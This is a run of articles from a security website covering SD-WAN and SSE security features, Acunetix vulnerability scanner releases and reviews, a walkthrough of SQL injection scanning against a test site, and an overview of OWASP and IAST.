Deployment costs will be higher and operations more complex than with a converged SD-WAN, but that’s necessary. Much of performance and cost benefits of an SD-WAN come from replacing MPLS access with direct Internet access at the branch office. By exiting Internet traffic locally, the SD-WAN avoids the backhaul and performance problems of traditional WAN configurations. Without advanced security at the branch office, users can’t take advantage of local Internet and remain immune to the range of Internet-borne threats.

Specific advanced security features to consider from an SD-WAN provider include:

Next-Generation Firewall (NGFW)

The NGFW should offer:

  • High performance and elasticity — Inspect all application traffic, regardless of volume or use of encryption, without forced capacity upgrades.
  • Application awareness — Identify access to on-premise or cloud applications regardless of the port or protocol being used, or if the application is SSL encrypted.
  • User awareness — Identify users, groups, and locations regardless of IP address
  • Unified, granular security policy — Control access to applications, servers and network resources

Secure Web Gateway (SWG)

The SWG should offer:

  • Dynamic site classification — The SWG capabilities should Include a URL database with many site category classifications including phishing, malware delivery, botnets and other malicious sites.
  • Block, prompt or track user access — The Reduce legal or security exposure from risky web usage
  • Web access policy enforcement — Restrict website access in accordance with a corporate policy

Advanced Threat Prevention

The advanced threat protection capabilities should include:

  • Anti-malware — Scan HTTP and HTTPS traffic for malicious files and stop endpoint infections.
  • IPS / IDS — Applies context-aware protection to traffic based on domain / IP reputation, geolocation, known vulnerabilities, DNS, as well as application- and user-awareness.

SD-WAN offers three options for delivering advanced security functions at the branch - local security appliances, virtual network function, or firewall as a service (FWaaS):

Local Security Appliances

Local Security Appliances such as firewall or UTM appliances, are the typical way companies protect branches. Appliances notorious for introducing operational complexity and increasing costs. There’s significant overhead incurred from configuring, patching and maintaining security appliances at each location. And, as mentioned above, using advanced security functions (or continuing to operate effectively when traffic levels spike), requires the use of significant hardware resources from the appliance. Often security professionals end up choosing between disabling advanced features, compromising organizational security, or being forced into a hardware upgrade.

Virtual Network Function (VNF)

VNF is a virtual network security stack deployed into a physical SD-WAN appliance or third-party applianced called a vCPE. As such, VNFs reduce the physical challenges of running separate physical boxes at the branch office — the HVAC issue, calculating power, and the rest of the wiring closet issues. However, VNFs are still discrete entities, requiring management of their software and upgrades, and facing the same scaling issues as any local security appliance.

Firewall as a Service (FWaaS)

Firewall as a Service (FWaaS) faces none of the scaling and maintenance challenges of local security appliance or VNFs. The infrastructure was built from the ground up as a cloud service, eliminating the management challenges and scaling issues of security appliances. They do require the service provider to offer a fully multitenant, easy-to-use, and powerful security engine that can be run fully by the customer.

Recommended SD-WAN Mobility Features

The SD-WAN was classically seen as a replacement to the WAN and, as such, did not focus on connecting mobility. But with data and applications shifting to the cloud, any SD-WAN should connect mobile and stationary users to those resources.

To do so, the SD-WAN should equip mobile users with client software for securely connecting into the SD-WAN. Once connected to the SD-WAN, the mobile user should be supported with the same optimized routing, security policies and management controls as users located within the office. Specific features should include:

Automatic optimum path selection — The SD-WAN mobile client should should dynamically select the optimum path to the closest SD-WAN node (closest PoP).

Access control — Once connected to the SD-WAN, fine-grained access controls should restrict mobile user access by application, active directory groups or specific user identity. Organizations should be able to determine the precise resources that can be seen and accessed by the mobile user.

Advanced security — Mobile users should be fully protected by any advanced security services provided by the SD-WAN, such as NGFW, IPS, and SWG.

Recommended SD-WAN Management Features

The management and administration console is the view into the SD-WAN. As such, usability and design are obviously critical.

In the example below, the CATO Networks SD-WAN management interface provides an intuitive interface from where we can monitor, configure policies and manage the entire WAN network without worrying about service providers, VPNs or network equipment!

 sd-wan management console

Managing a global 27 multi-location SD-WAN Network via CATO Networks

 

Other features to investigate for a future SD-WAN include:

SD-WAN configuration — The SD-WAN should allow for rapid site addition/removal; LDAP integration for quick addition of existing users into the SD-WAN; brief, well-documented integration process or automatic tools for cloud resource integration.

Converged configuration and reporting — Networking and security (if offered) should be tightly integrated together. A single, centralized view of all network and security events should be provided. Access-control definitions, security policies, networking policy configuration — all should be converged together. Reporting should be per site, VPN, and application.

Complete real-time visibility — The management console should provide complete visibility in realt-time into the core functioning of the SD-WAN, including the topology, connected devices, network usage statistics, as well as advanced security services.

Detailed usage metrics — Visibility into network usage should be granular, allowing IT professionals drill down into usage by VPN, location, device, user, and application. Monitoring and alerting should be provided on all networking and security events with full audit trail of all changes to system configuration and policies.

Application policy definition — The SD-WAN should allow for the creation of application policies including the specifying of the application’s importance (priority) and any relevant failover parameters.

Analytics engine and integration — An analytics engine should be provided by the product or easily integrated into the product.

Management protocols and APIs — The SD-WAN vendor should specify all northbound APIs for event correlation and user applications, and management protocols (e.g, SNMP, HTTP, XML) available for in-house integration.

Summary

This article explained what SD-WANs are and how enterprises and organizations of every size are moving towards these WAN solutions. We analyzed the problems with traditional WANs, saw the benefits of SD-WANs, SD-WAN architecture design and implementations, talked about SD-WAN deployment methods and touched heavily on SD-WAN Security, VPN, Advanced Threat Prevention, Firewall services, Mobility and Management offered by leading SD-WAN providers.

  • Hits: 59862

Security Service Edge (SSE) Limitations & Disadvantages. Protecting all Traffic, Users, Apps, and Services with 360-degree SSE

Introduction to Security Service Edge SSEThis article explores the Security Service Edge (SSE) portion of Secure Access Service Edge (SASE) and the need for holistic cybersecurity protections.

We lightly touch upon the drivers for tighter enterprise security and then dive into what SSE is, comparing its architecture and migration path to SASE to a 360-degree SSE approach which offers complete visibility, optimization and control with a seamless path to SASE convergence.

How Security Service Edge (SSE) fits into SASE’s Security Pillars

How Security Service Edge (SSE) fits into SASE’s Security Pillars

Key Topics:

Related Articles:

The Need For Holistic Security

Legacy security architectures presupposed security as local and siloed with appliances everywhere. Unfortunately, these architectures produced protection, performance, and visibility gaps, so the overall security requirements for enterprises have proven this model insufficient.

This outdated approach influenced the need for security simplification and assumes enterprises replace these architectures with a strategy that will:

  • Simplify security management
  • Minimize security blind spots
  • Inspect traffic flows in all directions
  • Deliver Zero Trust access everywhere
  • Give visibility and control into all traffic

SSE vs. 360-degree SSE: What is The Architecture Difference?

Security Service Edge (SSE) is new category introduced by Gartner, two years after SASE, and represents an essential step toward simplifying complex security architectures by consolidating them into cloud-delivered services. This allows enterprises to quickly adapt to new business and technical challenges like cloud migration, the growing hybrid workforce, etc.

The figure below represents the basic SSE architecture and its protection scheme:

basic sse architecture and protection scheme

Basic SSE Architecture and its protection scheme

Continue reading

  • Hits: 17759

Acunetix v13 Release Introduces Groundbreaking Innovations

Acunetix v13 Web Application Vulnerability and Network ScannerThe newest release of the Acunetix Web Vulnerability Scanner further improves performance and premieres best-of-breed technologies.

Acunetix, the pioneer in automated web application security software, has announced the release of Acunetix Version 13. The new release comes with an improved user interface and introduces innovations such as the SmartScan engine, malware detection functionality, comprehensive network scanning, proof-of-exploit, incremental scanning, and more. This release further strengthens the leading position of Acunetix on the web security market.

“Acunetix has always focused on performance and accuracy and the newest release is yet another proof of this,” said Nicolas Sciberras, CTO. “You cannot find these unique features in any other product.”

Unparalleled Performance

Scanning complex web applications using traditional web vulnerability scanners may take hours, having a serious impact on production site performance and internal processes. Acunetix addresses this problem by introducing even more innovations that improve scanning performance.

acunetix v13 web application and network vulnerability scanner interface

The SmartScan engine included with Acunetix v13 prioritizes unique pages to discover more vulnerabilities early on. In most cases, Acunetix SmartScan can find approximately 80 percent of vulnerabilities in the first 20 percent of the scan. The newest Acunetix engine also reduces the number of requests required to find vulnerabilities, which lessens the site load during the scan.

In addition to the SmartScan engine, the newest Acunetix release also introduces incremental scanning. You can choose to scan only the elements of your web application that have changed since the last full scan. On average, it shortens the process by 90 percent or more.

Comprehensive Security Coverage

With the release of Acunetix v13, network scanning functionality is now available on all platforms. Web vulnerabilities and network vulnerabilities are part of the same assessment and management processes.

In addition to the previously available malicious link discovery function, the newest Acunetix release also introduces web malware scanning. Acunetix discovers scripts on websites and web applications, downloads them, and scans them locally using Windows Defender on Windows or ClamAV on Linux.

Further Advances In Automation

Acunetix v13 introduces two new features that greatly improve automation, especially in the case of larger organizations. The vulnerability confidence level clearly indicates whether the vulnerability may need further manual confirmation. Critical vulnerabilities typically have a 100 percent confidence level, which means that they are fully verified. For most such vulnerabilities, Acunetix now also provides a proof-of-exploit, such as the content of a sensitive file downloaded from the server.

The newest release also enhances the import and integration capabilities of Acunetix. The scanner can now additionally import WADL, ASP.Net WebForms, and Postman files to seed the crawl. You can also export vulnerabilities to even more issue trackers: GitLab, Bugzilla, and Mantis.

Technology Improvements

With all the new advances comes an improved user interface, featuring better sorting and filtering as well as response highlighting and improved accessibility.

In addition to the above innovations and improvements, the Java AcuSensor technology now supports the Spring framework, while the DeepScan crawling engine can now directly recognize Angular 2, Vue, and React frameworks and adjust crawling to their requirements.

Acunetix, The Company

Founded in 2005 to combat the alarming rise in web application attacks, Acunetix is a pioneer and market leader in automated web application security technology. Acunetix products are trusted globally by individual security experts, SMBs, and large organizations. It is the security provider of choice for many customers in the government, military, educational, telecommunications, banking, finance, and e-commerce sectors, including the Pentagon and Fortune 500 companies such as Nike, Disney, and Adobe.

  • Hits: 3936

How to Test for SQL Injection Attacks & Vulnerabilities

scanning for sql injection vulnerabilitiesSQL injection vulnerabilities have held the first spot on the OWASP Top 10 list for quite some time. This is due to the fact that they are both still widespread and can lead to very serious consequences. Many major security breaches were caused by SQL injections, even in recent months. For example, this type of vulnerability caused a leak of financial data for more than 70 percent of citizens of Bulgaria.

However, SQL vulnerabilities are also easy to discover automatically using web vulnerability scanners. Advanced web security scanning software can detect even the more advanced type of SQL injections such as blind SQL injections. SQL injections are also easy to fix and avoid. Developers can use parameterized queries (prepared statements) or stored procedures to avoid the root cause of SQL injections, which is the direct use of untrusted user input in SQL queries.

In this article, we will show you how to scan your web applications for SQL injections using the latest version of Acunetix. The scan will be performed on the VulnWeb site by Acunetix, which is intentionally vulnerable to attacks. The article assumes that you have downloaded and installed the Acunetix demo.

Key Topics:

Related Articles

STEP 1: CREATING A SCAN TARGET

To begin testing your web application for SQL injections, you need to add your web application URL as the target.

  1.  Click on the Targets icon in the menu on the left. The Targets pane is displayed.

Creating a new target to scan for SQL Injection Vulnerabilities

  1. Click on the Add Target button. The Add Target dialog is displayed. In the Address field, enter the full URL of your web application. Optionally, in the Description field, enter a human-readable description of your target:

Adding a new target url to scan for sql vulnerabilities

  1. Click on the Add Target button in the Add Target dialog. The Target Info pane is displayed:

tweaking sql vulnerability scanning speed and settings

  1. In the Target Info pane, you can configure additional properties of the target. For example, you may choose to use AcuSensor technology, which requires that you install the AcuSensor agent on your web server. We recommend that you use this technology to increase the precision of your scanning.

STEP 2: PERFORMING A SCAN

Once your target is added and configured, you can scan it whenever you need to. You can also schedule your scans for the future. There are different types of scans, depending on your current needs. In this article, we will perform an SQL injection scan.

  1.  Click on the Scan button in the Target Info pane. You can also click on the Scans icon in the left-hand menu to open the Scans pane, select the target by clicking on the leftmost column, and click on the New Scan button. The scan is started. You can see the progress of the scan in the Activity section:

scanning for sql injection vulnerabilities

  1. When the scan is finished, a Completed icon will be visible in the Activity section:

sql injection vulnerability scan complete

STEP 3: INTERPRETING RESULTS

When the scan is completed, you can analyze the details of the discovered vulnerabilities so that you know how to eliminate them. Acunetix provides additional information about all vulnerabilities as well as helpful links that teach you how to fix the issue.

  1. To see the details of vulnerabilities discovered during the scan, click on the Vulnerabilities tab. You can also click on the Vulnerabilities icon in the left-hand menu to see vulnerabilities for all targets at the same time:

list of sql injection vulnerabilities detected

  1. To see the details of a selected vulnerability, click on the row in the table that represents the vulnerability. The vulnerability details panel is displayed:

examining sql injection vulnerabilities detected

As you can see above, Acunetix provides exact details of the payload and the resulting SQL query. Since AcuSensor technology was used, the report also shows the source file and the line of code causing the SQL Injection vulnerability.

Summary

This article showed how to detect SQL Injection Vulnerabilities on your website, web application and CMS system. We saw how easy and quickly the Acunetix Web Vulnerability Scanner can be used to scan and obtain a full report of all SQL Injection vulnerabilities and exploits your systems are susceptible to.

  • Hits: 13115

What is OWASP? Open Web Application Security Project - Helping Developers and Businesses Raise Awareness on Cyber-Security Attacks, Vulnerabilities and Security Threats

introduction to owaspWith nearly every business sector relying on the internet and digital tools to function, it is no surprise that cybersecurity is the second-fastest growing industry. Hackers don’t care how large or small your company is. They will target all sizes in an all-out effort to steal data, access confidential or classified information, cause mayhem, and hurt the organization's reputation.

Fortunately, not all hackers have nefarious intentions. The open source community is full with experts who are looking to warn people about threats and find the most effective ways to keep data safe. Many of those experts are a part of the Open Web Application Security Project (OWASP).

In this article, we'll cover the basics of OWASP and the critical role this work plays in the everyday operation of computers, servers, and other forms of modern technology. Topics covered include:

What Is OWASP? Introduction To Open Web Application Security Project

OWASP was originally founded in 2001 by Mark Curphey and is run as a not-for-profit organization in the United States. The bulk of its contributors are pulled from the open-source community. Today, more than 32,000 people volunteer as part of OWASP's efforts, with much of their communication coming through message boards or email distribution lists.

The organization is designed to be an unbiased group focused on the best interests of the technology world as a whole. They will not promote specific vendor products or solutions. Instead, OWASP aims to provide practical information to organizations all across the world, with the goal of offering helpful security advice to bring about more informed decisions.

Where OWASP becomes particularly valuable is too small and medium-sized businesses that may not have a large IT budget and lack expertise when it comes to cybersecurity. Thanks to the documentation that OWASP creates, these types of organizations can gain a better understanding of where their systems are vulnerable and how to protect themselves better.

If you’ve heard of OWASP, it’s likely been in conjunction with a report they update every few years known as the OWASP Top 10. The list covers the most relevant cybersecurity threats facing the global community. Later in this article, we'll dive into some of the specifics referenced in the Top 10.

Importance of Vendor Neutrality (OWASP)

The OWASP community is firm about never endorsing specific products or services related to cybersecurity. This might seem counterintuitive. A company needs to make investments in certain tools if they hope to protect their digital assets. And knowing what vendors to trust is important.

However, the purpose of OWASP is to draw attention to the largest security threats we are facing today. If they were to accept advertising or payments for endorsements, then they would lose their impartial status and reliability. You would not know whether they were recommending a security tool because it was actually the best or because someone was paying them to say so.

In a perfect world, all security vendors would produce products and services that function as intended, whether they are developing virus scanners, malware detectors, or software firewalls. But the dirty underbelly of the industry is inhabited by the cybercriminals who try to disguise their attacks within security tools that are designed to look legitimate.

There is no perfect vulnerability security tool or solution, which is why OWASP avoids picking certain products to recommend. The members of OWASP want to highlight security risks to inspire organizations to go out and find a solution that works best for them.

Members of OWASP have a strict set of rules when it comes to dealing with vendors. There are not allowed to seek sales pitches or participate in a technology talk sponsored by a brand. No materials should be distributed in OWASP mailing lists that focus on particular vendors or products.

Why Web Application Security Matters

web application vulnerability scanningOrganizations with unimpressive IT budgets may be tempted to minimize how much they spend on security-related tools, activities, and training due to the challenge to mathematically determine what the return on investment (ROI) will be. If one thing is certain, it’s that management will want to know the ROI and when cyber-attacks are in play, coming up with an accurate representation of how much a successful penetration could have cost is, well, not easy.

But lowering the priority of cybersecurity protection is dangerous. Instead, you need to treat it like you would car insurance or health insurance. Everyone likes to think that they won't get into a car accident or have to go to the hospital, but insurance is there to cover you for unexpected incidents.

With IT security tools, you typically purchase a solution entirely or else pay for a subscription on a monthly basis. In either case, you spend money up front to avoid disaster for your entire organization. The point is to protect yourself from attacks before you even know you are being targeted.

Cybercriminals obsessively spend their lives looking for system vulnerabilities that can expose data or bring down entire servers. Usually, money is the primary objective, with the attackers seeking to sell stolen data on the dark web for profit. In some cases though, the attack is meant purely to destroy a company's reputation or ability to operate.

The goal of OWASP is to track the most common tactics that hackers utilize and identify what sort of protection is required to defend against them. New vulnerabilities are discovered every day, so that's why it's critical to maintain cybersecurity as an active part of your organization's operations. Buying a set of security tools is not enough. You need to keep those up to date and watch for new types of attacks that demand new types of solutions.

The OWASP Top 10 List

owasp top 10

OWASP Top 10 List

As mentioned before, OWASP is best known for the Top 10 List of security vulnerabilities that they revise and publish regularly. The latest version is from 2017 and remains applicable today. The Top 10 List documentation includes an explanation of each risk as well as diagrams and prevention tips.

SQL Injection Attacks

Many of the threats on the Top 10 List are targeted at software developers who write code and may discover these types of security flaws during the course of their work. For example, the first risk listed is concerns database injections for SQL and other platforms. Hackers have used injection vulnerabilities for years to manipulate front-end inputs like search fields to retrieve or edit data that should be inaccessible to them.

Cross-Site Scripting Attacks

Another major code-based risk is cross-site scripting (XSS) attacks, where a cybercriminal will find a way to execute JavaScript or HTML on a remote webpage. Often, they will redirect users to a rogue URL where they try to steal personal information or financial data.

Best of the Rest

Some of the other items on the Top 10 List exist at a lower level of coding. For example, there are software libraries and frameworks that have known vulnerabilities that hackers can exploit. If your organization uses software that requires such an asset, then you should consider it to be at risk until it is patched.

But even if your coding standards are strict and secure, there are still risks that exist at a system or network level. Sensitive data exposure is included in OWASP's Top 10 List, as major data breaches have become a regular occurrence among businesses of all sizes and within all industries.

Accessing Digital Resources Securely

Obviously, OWASP is a huge fan of impressing upon organizations the critical need for internal and external users to only access digital resources securely. There are a variety of ways to accomplish this, not limited to:

  1. Forget the old advice that an eight character password is good enough. Modern password managers allow you to create incomprehensibly complex codes that run to 12 or 16 characters or longer.
  2. Think before you click. As social engineering scams have moved online, every member of your company needs to be educated to be suspicious of every link because a nasty bit of malware could be hiding on the other end.
  3. Use a virtual private network (VPN) in conjunction with your regular ISP. The cost is modest and it allows you to apply military-grade encryption to your data flow every time you go online. Another VPN benefit is that you receive a new anonymous IP address that makes it difficult for a bad guy to determine exactly where you are.
  4. Back up - as in backup your network regularly. There’s a decent chance a hacker will eventually be successful. At that point, your best defense is to be able to roll back the network to a previous point in history before the malware got in.
  5. Multi-Factor Authentication (MFA). MFA is quickly becoming an industry standard requiring users to verify their identity using additional means other than their password. Usually, the second authentication is a One-Time-Password (OTP) or a Push notification-verification via an application installed on the users’ phone.

There are hundreds of other preventative measures to take to keep your system safe but these four will get you a long way down the road while you get up to speed on all the security education OWASP has to offer.

Summary

Before you jump to purchasing costly solutions from vendors to cover each scenario on the OWASP Top 10 list, remember that a huge part of cybersecurity is awareness and education. Members of your organization should attend training on a regular basis to understand what risks exist for them both as users and system owners.

Following the lead of the OWASP community can help your company maintain a strong reputation. If your cybersecurity efforts are working properly, they should be invisible to people inside and outside of your organizations. Problems begin when a hacker manages to compromise your systems, leaving your digital assets and customers at risk.

  • Hits: 10454

Precision Web Application Vulnerability Scanning with Interactive Application Security Testing (IAST)

web application vulnerability testingThere are two primary approaches to web application security testing. Dynamic Application Security Testing (DAST), also called black box testing, imitates an attacker.

The application is tested from the outside with no access to the source code or the web server. Static Application Security Testing (SAST), also called white box testing, imitates a code reviewer. The application source code is analyzed from the inside.

Before we dive deeper into these interesting web application testing and vulnerability scanning technologies, let's take a quick look at what's covered:

Analyzing Dynamic Security & Static Application Security Testing

Both of these methods have lots of advantages. The DAST approach is very practical and has huge coverage. You can run a black box test on an application written even in the most exotic technology or language. Its coverage is even bigger because detected vulnerabilities can be caused for example by bad configuration and not by mistakes in the source code.

On the other hand, SAST can let you discover some things that are not obvious when seen from the outside. For example, additional URLs or parameters. With white box testing, you also know immediately where the problem is located in the source code so it speeds up fixing.

interactive application security testing

IAST provides precision web vulnerability scanning

Imagine how effective a security scan can be if you were to join the two methods together! And no, this is not just theory, it actually exists. The merger of these two approaches is called Interactive Application Security Testing (IAST) or gray box testing and is available for example in Acunetix (thanks to its AcuSensor technology).

What Can You Do with IAST?

web application security testingA gray box testing solution adds hooks around key calls (for example, database calls, system calls, etc.). Those hooks, often called sensors, communicate two ways with the IAST scanner. Hooks do not require access to the source code. The scanner works directly with the interpreter or the application server.

Sensors provide additional information about the calls. In addition, they can provide a full site map from the point of view of the web server. For example, a standalone DAST scanner would not be able to find a URL or a URL parameter that is not linked to or in some way announced by the application. However, with a full site map, the IAST scanner can attempt to test the unannounced URLs/parameters.

Some security flaws may also be caused by bad configuration. This is another activity in which an IAST scanner can excel. Sensors can help to find security errors in interpreter/compiler configuration files and provide the scanner with additional information to attempt attacks based on these configuration properties.

Last but not least, these two methods together can have a significant impact on the reduction of false positives! For example, when you run a time-based blind vulnerability test with a DAST scanner, the scanner may only guess that a time delay is caused by a vulnerability (for example, an SQL server processing a sleep command). When you have a sensor that is monitoring what is going on server-side, you can be one hundred percent sure what causes the time delay.

Web Application Vulnerability Scanning - Automation To The Rescue

Using a sensor requires no additional work from developers. The IAST scanner uses clever tricks to intercept calls. When it is working with an interpreter, it listens in on the communication between the interpreter and the web server. It analyzes this communication, finds all the potentially risky calls, and uses even more clever tricks to modify calls on the fly by adding hooks. When it is working with a bytecode compiler, it taps the communication with the application server.

IAST may make developer work even easier. If you use a DAST scanner and find a vulnerability, the developer always needs to go through the source code to identify the location of the security issue. But in some cases, a sensor may be able to pinpoint the root cause of the vulnerability and show you the line of code or give you a stack trace.

Where’s the Catch? Supporting PHP, Java and .NET

Gray box testing looks too good to be true. The only problem is its coverage. Just like SAST scanners, IAST works only with specific programming languages and environments. At the moment, AcuSensor supports PHP, Java, and .NET. However, taking into consideration that according to W3Techs surveys these three technologies together cover 94.4% of the landscape, this should not be much of a concern for most.

  • Hits: 6565

Free Web Application Vulnerability Report (2019) – Popular Web Attacks, Vulnerabilities, Analysis, Remediation

2019 web application vulnerability report – Popular Web Attacks, Vulnerabilities, Analysis, RemediationAcunetix has just released their annual Web Application Vulnerability report which aims to provide security professionals, web application developers, system administrators, web server administrators and other interested parties with an analysis of data on web application vulnerabilities detected the past year via scans run on the Acunetix Online platform.

The extensive report has been compiled from scans performed from more than 10,000 targets and reveals some very interesting results about today's security threats and the percentage of organizations that correctly deal with their vulnerable web applications and exploits. From SQL Injection vulnerabilities to Cross-Site-Scripting (XSS) vulnerabilities, popular CMS platform vulnerabilities to remediation steps and more.

Here are some of the report's highlights that will surely interest every IT security professional and web application developer

  • 46% of websites scanned contained high severity vulnerabilities
  • 87% of websites contained medium severity vulnerabilities
  • SQL Injection vulnerabilities have declined slightly
  • 30% of websites contained Cross-Site-Scripting (XSS) vulnerabilities
  • 30% of websites had vulnerable JavaScript Libraries
  • 30% of websites were WordPress sites with a number of vulnerabilities

The report is a great opportunity for professionals to learn more about the latest and greatest vulnerabilities circling the web and proactively take measures to ensure their own websites and web applications are properly tested and patched against popular vulnerabilities and attacks.

Here’s vital security information the 2019 Web Application Vulnerability Report contains:

  • Vulnerabilities that are rising and falling in frequency
  • Vulnerability findings by type and severity
  • Changes in the threat landscape from both clients and server sides
  • The four major stages of vulnerability analysis
  • Detailed analysis of each discovered vulnerability – how it works, pointers and remediation steps
  • Current security concerns – increasing complexity of new applications, accelerating rate of new versions and the problem of scale
  • Vulnerabilities that are major to the security of all organizations, regardless of their size and location.
  • Plenty of useful information and advice aimed for network security professionals, web application developers, IT Managers, security auditors, application architects and more.

The 2019 Web Application Vulnerability Report is used by leading security professionals and web application developers to help understand how to protect network and applications for the latest security threats and web vulnerabilities.

2019 web application vulnerability report pages

  • Hits: 6859

Acunetix Enterprise: Find Website - Web Application Vulnerabilities & Security Flaws Before Hackers Do

acunetix vulnerability scanner on pcSecurity researchers disagree about the percentage of vulnerable websites, but most concur that it’s way too high. Despite their long history, attackers continue to use cross-site scripting (XSS), SQL injection and more to successfully compromise sites and web applications. In today’s era of cloud-based and on-premises web applications that connect directly into the organization - it’s more important than ever to take a step back and consider the risk of web & security vulnerabilities that can leave your organization open to hackers.

As web applications scale, manual security assessments can become time-consuming and challenging to process while outsourcing these tasks won’t always provide the desired result. In many cases, a degree of automation is the way forward, and the decision becomes which web vulnerability scanner to choose.

Firewall.cx has written extensively about the pros of web vulnerability scanners, popular tools, and good common security practices. Despite this, we keep coming back to Acunetix, and it recently received a major upgrade. Version 12 of the enterprise-grade security tool is a significant leap forward that deserves an in-depth assessment.

Founded in 2005, Acunetix was designed to replicate hackers, yet catch vulnerabilities before they do. The leaps and bounds since its release have led to use in government, military, and banking, as well as partnership with Microsoft and AWS.

Before we dive in our in-depth analysis let’s take a look at the topics covered:

Installing and Using Acunetix 12 Enterprise

When it comes to sheet usability, it’s easy to see why. While most readers will have no problems with complex setups, it’s always nice to avoid the hassle. Acunetix’s installation is a matter of creating an admin account, entering the license key, and choosing a port.

acunetix enterprise installation

All told, it took a matter of minutes to get up and running and didn’t require any additional configuration or restarts. For Enterprise customers, multi-engine deployment is also available, allowing for more simultaneous scans. As you’d expect, the setup is a little more complex, but still only requires a single line in command prompt and some additional registration inside Acunetix. Once configured, users can set targets to only scan with a specific engine and can push past the normal limit of 25 simultaneous scans.

However, many organizations will still want to setup user accounts for different roles. The software has three different account types for Tech Admins, Testers, and Auditors:

acunetix enterprise user groups

Adding additional users is possible via a tab in the settings menu, with an email and secure password with special characters required. After selecting a role, the admin can decide whether to give users access to all targets or add them to a specific target group at a later date.

acunetix enterprise creating accounts

Standard licenses are limited to one user, but Enterprise and Online plans can make an unlimited number, all with separate roles and targets. For additional security, admins can enable two-factor authentication, enforce password changes, and specify the amount of login failures before lockout.

Scanning Web Applications and Websites with Acunetix 12 Enterprise

After installation, Acunetix’s web portal opens in the default browser. Users are taken to the dashboard, which reveals the number of open vulnerabilities discovered, websites scanned, and most common vulnerabilities.

acunetix enterprise main dashboard

Click to enlarge

Users are able to click on the High, Medium, and be taken straight to the Vulnerabilities section for a detailed breakdown. They can click through to specific websites, vulnerability types, and active/waiting scans. It’s a fairly comprehensive overview, and it gets more interesting when you hit the show trends button.

Here, Acunetix gives some long-term metrics. Line graphs show the number of open vulnerabilities in a 12-month period, the average number of days to remediate issues, issues over time, and more.

acunetix enterprise attacks

However, though the dashboard presents a nice overview, core functionality is found under the Targets heading. Users are able to click the Add Target button and enter and website or application URL with a description for easy identification.

acunetix scan site setup

Acunetix then presents you with a number of options, separated into General, Crawl, HTTP, and Advanced tabs. The general tab lets you specify the business criticality of the target, which helps to prioritize the vulnerabilities it detects. You can also set the speed of the scan and choose to scan continuously to monitor the progress long-term. If a scan is taking too long, you can pause it and continue at a later date.

With advanced options, you can specify the languages to scan, add custom headers and cookies, and specify allowed hosts. There’s also the ability to import files for the crawler, such as URL lists and Fiddler Proxy Export. You can even craft custom scan types to look for recently disclosed vulnerabilities.

The search section also houses the site login option, which gives the app access to restricted areas for better scanning.  In most cases, Acunetix can login to the site automatically, but there’s also an option to record your login sequences via a dedicated sequence wizard.

acunetix enterprise site scan

It seems Acunetix has thought of pretty much everything here, and a scan of known test sites revealed many types of issues. It was adept and discovering several instances of cross-site scripting, as well as expression language injection and DOM-based XSS.

Importantly, though, it was also able to find issues that weren’t as critical. Medium severity issues such as Apache httpOnly cookie disclosure, HTML injection, vulnerable Javascript libraries and more were all discovered. Acuentix has made several improvements to their scan times, and we found scans to take no more than 15 minutes even on large sites and with a slow connection.

acunetix enterprise vulnerability list

As mentioned earlier, you can drill down into specific vulnerabilities for more information. A page will give an explanation of the vulnerability, the details of the attack, HTTP requests, and impact. Critically, there’s also information about how to fix the issue, as well as a CWE link and CVSS information. Once reviewed, you can mark them as fixed, ignored, or false positive.

acunetix enterprise examining vulnerability

You’re also able to look at vulnerabilities from a site vulnerability perspective, looking at the status of individual files and the specific parameters within them.

AcuSensor – Achieving 100% High-Severity Vulnerability Accuracy

Despite all this, Acunetix emphasises that its users will get better results with the use of AcuSensor. The AcuSensor agent is available for installation on the website in PHP, .NET, and Java form, and improves the accuracy of the scan with better crawling and detection, and well as a decrease in false positives. The company promises a 100% high-severity vulnerability accuracy and detection of a larger range of SQL injection issues.

acunetix enterprise how acusensor works

The tool also gives line-of-code information for PHP applications and stack traces for ASP.NET and Java, as well as example SQL queries for injections. This makes it a very powerful offering, though it isn’t recommended for production environments.

Via a Jenkins plugin, the Enterprise variant can also be implemented in continuous integration processes. Jenkins can automatically trigger scans and reports with each build, creating both PDF Acunetix versions and an HTML Jenkins one. It can also fail builds if a certain threat level is reached. There’s a REST API for other integrations, with up-to-the-minute status of ongoing scans, vulnerability details, and more.

Acunetix Reporting, Exporting, and Issue Tracking

Once a scan is complete, users have several options of how to proceed. A strong point of Acunetix is its support for a number of Web Application Firewalls. The software’s WAF Export option supports a number of major solutions, including F5, Imperva, and Fortinet. For others, there’s the choice to export as a regular XML, but that’s only available if you export a full scan. For specific vulnerabilities, you’ll have to use one of the other formats.

acunetix enterprise reporting

Perhaps more useful is the ability to send vulnerabilities to an issue tracker, though it does have to be configured first. After finding the option, you add GitHub login details and selecting the relevant project. There’s the option to specify an issue type, as well as validate the connection before exiting.

You then have to set up the tracker to with every site by heading back to Targets menu and changing the advanced option. It’s a little clunky to add the option retroactively, but it gets the job done.

acunetix enterprise reporting

In Firewall.cx’s testing, the issues pushed to GitHub near-instantly, with relevant labels and all of the information provided. That includes the target URL, severity, attack details, HTTP requests, impact, remediation suggestions, and references. It all works with a single button press and we have no doubt this will greatly speed up workflows.

Similar functionality exists for JIRA and Microsoft TFS, though JIRA currently has a limit of 20 issue tracker items. It’s generally smart during the process, refusing to open duplicate issues for the most part.

Overall, the issue tracker capabilities are quite impressive and intuitive, but there are options for traditional reporting if your organization requires it. There a number of standard templates, but also a total of ten different compliance templates, which is extremely useful.

acunetix enterprise compliance reporting templates

Reports are available in PDF or HTML for CWE 2011, HIPAA, ISO 27001, OWASP, and more. Each starts with an explanation and continues with a category-by-category breakdown with the number of alerts and information about each.

acunetix enterprise reporting

There’s no real room for customisation here, but there’s little need for it. Everything you’d expect is covered, and displayed in a logical, if not particularly pretty way. Reports generate quickly in the background and can be produced on a per-scan, per-target, or bulk basis.

Conclusion

Firewall.cx first began its journey with Acunetix began almost 12 years ago with its standalone Windows 98 program. The distance the web vulnerability scanner has come since then is truly immeasurable, managing to keep up with the competition as other companies have faded into the background.

The product sports a minimal and modern UI, but its results aren’t to be scoffed at, being the only one to net out-of-band vulnerabilities. Its long time in the industry has allowed it to think of pretty much everything, with no major drawbacks to speak of and new integrations in the works. Though report design is average, the number of templates is higher than usual, and many will lean on its issue tracker support.

Thanks to Acunetix Enterprise v12, organizations are now able to scan in-house, third-party and cloud-based web applications or websites for security vulnerabilities such as SQL injections, Cross-Site Scripting attacks, hundreds of other security flaws, and take corrective action. Developers can automate vulnerability assessments in their processes, achieve 100% high-severity vulnerability accuracy thanks to AcuSensor and detect of a larger range of SQL injection issues. Compliance reports can be generated to suite CWE 2011, HIPAA, ISO 27001, OWASP standards and much more.

